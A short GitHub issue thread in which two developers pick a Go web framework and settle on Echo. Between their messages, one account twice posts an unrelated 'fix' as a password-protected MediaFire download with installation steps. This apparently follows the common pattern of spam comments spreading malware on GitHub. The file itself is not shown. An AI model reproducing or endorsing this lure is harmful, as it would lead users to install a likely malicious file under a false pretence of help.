### ISSUE TITLE
Goのフレームワーク検討

### ISSUE THREAD

**Issue by Taiki130** [chaos-tech/training-note#2]
net/http packageでも良いかも

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Taiki130** [comment]
Echoに決定
